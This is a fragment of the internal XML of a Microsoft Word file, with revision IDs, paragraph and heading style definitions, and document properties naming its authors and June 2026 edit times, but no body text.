    <w:rsid w:val="6D023397"/>
    <w:rsid w:val="6D983A6E"/>
    <w:rsid w:val="6DB6203D"/>
    <w:rsid w:val="6EF4CDDF"/>
    <w:rsid w:val="6F475F2B"/>
    <w:rsid w:val="6FC8BFE2"/>
    <w:rsid w:val="6FEBEA8F"/>
    <w:rsid w:val="707BC5A9"/>
    <w:rsid w:val="708A012C"/>
    <w:rsid w:val="70A3B46D"/>
    <w:rsid w:val="70C223EB"/>
    <w:rsid w:val="7202D49E"/>
    <w:rsid w:val="738B6C78"/>
    <w:rsid w:val="75E91624"/>
    <w:rsid w:val="779BC790"/>
    <w:rsid w:val="7909A0FB"/>
    <w:rsid w:val="797D9491"/>
    <w:rsid w:val="7983E8C6"/>
    <w:rsid w:val="7A50170B"/>
    <w:rsid w:val="7A6BA895"/>
    <w:rsid w:val="7B67AED5"/>
    <w:rsid w:val="7B7C1FD8"/>
    <w:rsid w:val="7C61B6A5"/>
    <w:rsid w:val="7D11B4F9"/>
    <w:rsid w:val="7D700245"/>
    <w:rsid w:val="7DA37CDF"/>
    <w:rsid w:val="7DF9ED33"/>
    <w:rsid w:val="7E3DC4FF"/>
    <w:rsid w:val="7E7574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46FC7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DF623EC6-7FE3-4A23-B90B-9D8EB70EA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FA87A0B"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="3FA87A0B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>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FA87A0B"/>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6B547-EE0F-43F1-BDF2-2683C5D30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877</Words>
  <Characters>5005</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>41</Lines>
  <Paragraphs>11</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Dinh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Anh Tuấn</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-08T02:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-08T04:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>